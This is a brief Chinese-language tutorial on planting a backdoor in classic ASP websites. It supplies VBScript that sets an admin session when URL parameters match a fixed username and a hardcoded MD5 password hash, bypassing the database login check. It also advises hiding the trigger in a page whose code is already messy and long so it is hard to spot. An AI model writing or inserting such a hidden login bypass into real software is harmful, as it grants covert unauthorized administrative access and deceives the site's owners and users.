留后门:
一:
写个函数(功能:不通过数据库比较,直接用固定的用户名+MD5(密码)进入)
例:
'func1.asp
<!--#include file="md5.asp"-->
sub superlogin()
if request("user")="admin" and md5(request("pass"))="7a57a5a743894a0e" then
'密码也用md5加密,示例为admin
session("login")="admin" '假设你的系统,如果管理员登录是这样赋值的。
'成为管理的多个条件在此添加。
end if
end sub
二:
'任意页面中(最好感觉代码即乱又多的那种),设:xxx.asp
'可以在某处插入下面的代码
'当URL的参数的user及pass不为空时,下面的代码才被激活
'也就是平常,你不传递给上面两个参数传递值。下面的代码是不工作的。
<!--#include file="func1.asp"-->
<%
if request("user")<>"" and request("pass")<>"" then
superlogin
end if
%>